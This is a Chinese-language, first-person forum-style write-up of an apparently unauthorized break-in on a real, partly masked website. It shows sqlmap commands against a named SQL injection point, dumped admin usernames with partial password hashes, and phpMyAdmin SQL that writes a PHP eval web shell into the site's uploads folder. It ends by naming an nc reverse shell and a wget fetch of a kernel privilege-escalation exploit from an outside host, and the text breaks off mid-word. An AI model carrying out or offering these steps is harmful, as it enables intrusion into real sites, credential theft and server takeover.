渗透目标
真的网址我
www.pjxxxx .net
服务器类型
Target: /showpr.php?pid=7155
Host IP: xxx.xx.xx.148
Web Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
Powered-by: PHP/5.2.13
DB Server: MySQL >=5
Current DB: pjxx
注入点
/showpr.php?pid=7155
爆出信息
Data Found: adminname=liuxxxxxx
Data Found: password=df7ca2a8exxxxxx
Liuxxxxxx liuxxxxx
Data Found: adminname=root
Data Found: password=66497fbbxxxxxxxx
root lxxxxxx
这里信息我修改下。
后台地址:
/admincp.php
成功 进入 后台
Data Found: adminname=liuxxxxxx
Data Found: password=df7ca2a8e7xxxxxx
liuxxxxx
没发现能利用的地方
可能 有的朋友想 root 都出来了 怎么不去phpmyadmin 呵呵 第一次渗透的时候
没找到后台 总之这个站我看了好久…..继续
爆出网站路径 先留着后面用
/admin/news.php
require_once(./include/common.inc.php)
/home//admin/news.php
http://www.pjxx .net/bbs/config.inc.php
原来扫没出来 这次 随便一试 出来了 真是 坑爹啊 root 去登录赛……
/phpadmin/
好吧 再次 坑爹 测试前面的两个帐号都不能登录
我也忘了 这是第几天了…..
Sqlmap 注入 测试 这里我用他因为我的萝卜头 不好使
查看数据库
sqlmap.py -u "/showpr.php?pid=7155" --dbs -v
看指定库的表
sqlmap.py -u "/showpr.php?pid=7155" –D 库名 --table
Database: pjxx
[168 tables]
++
| cdb_access |
| cdb_activities |
| cdb_activityapplies |
| cdb_adminactions |
| cdb_admincustom |
| cdb_admingroups |
| cdb_adminnotes |
|省略一些
sqlmap.py -u "/showpr.php?pid=7155" –columns –T --+表 没加好
http://www.pj9xxnet/uc/admin.php?m=user&a=login&iframe=&sid=
找不到密码 先放几天……
话说这个站 我看了好久…..不甘心 就一直在搞 中间我去请教大牛
了 嘎嘎
最后突破口是sqlmap 读配置文件….. 好吧我真不会这个….
读配置文件
为了解密害我到2 点才睡。小菜我不会啊。关电脑我想到 win7 下有个目录的,先睡觉….
第二天 原来这么看……. 我日……
记事本打开
登录
/phpadmin/
用户 root 密码 xxxxxxxxxx
这样 就可以 phpmyadmin 写一句话了
不会的百度吧反正我是第一次我百度 的
网站绝对路径 /home// 这是n 天前搞到的
我是按照这个方法来弄的
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>');
SELECT * FROM `a` WHERE 1 into outfile '/home//uploads/mao.php'
菜刀
接下来提权 (第一次linux 下提权)
内核版本什么我看过了不截图了
nc 反弹
下载 exp
wget .hk/attachment/mc/2.6.9
ch